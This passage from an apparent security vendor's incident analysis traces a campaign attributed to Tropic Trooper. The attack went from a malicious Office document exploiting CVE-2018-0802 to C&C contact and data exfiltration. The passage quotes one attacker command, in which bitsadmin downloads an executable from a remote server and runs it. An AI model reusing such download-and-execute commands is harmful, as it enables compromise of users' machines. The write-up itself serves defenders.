Investigating alert timelines and process trees
We discovered the attack when Windows Defender ATP called our attention to alerts
flagging several different suspicious activities like abnormal Office applications activity,
dubious cross-process injections, and machine-learning-based indications of anomalous
executions flows. The sheer volume and variety of the alerts told us something serious was
going on.
1/5
Figure 1. Multiple alerts triggered by the attack
The first detection related to the attack was fired by a suspicious EQNEDT32.exe behavior,
which led us to the entry vector of the attack: a malicious document that carried an exploit
for CVE-2018-0802, a vulnerability in Microsoft Office Equation Editor, which the actor
known as Tropic Trooper has exploited in previous campaigns. Using Office 365 ATP
Threat Explorer, we found the specific emails that the attackers used to distribute the
malicious document.
Using Windows Defender Security Center, we further investigated the detected executable
and found that the attackers used bitsadmin.exe to download and execute a randomly
named payload from a remote server:
bitsadmin /transfer Cd /priority foreground http:/:4560/.exe
%USERPROFILE%\fY.exe && start %USERPROFILE%\fY.exe
Machine timeline activity showed that the executed payload communicated to a remote
command-and-control (C&C) server and used the process hollowing technique to run code
in a system process memory.
In some cases, the attacker ran additional activities using malicious PowerShell scripts.
Windows Defender ATP’s Antimalware Scan Interface (AMSI) sensor exposed all the
attacker scripts, which we observed to be meant mostly for data exfiltration.
2/5
Figure 2. Process tree
Using the timeline and process tree views in Windows Defender Security Center, were able
to identity the processes exhibiting malicious activities and pinpoint exactly when they
occurred, allowing us to reconstruct the attack chain. As a result of this analysis, we were
able to determine a strong similarity between this new attack and the attack patterns used
by the threat actor known as Tropic Trooper.
Figure 3. Campaign attack chain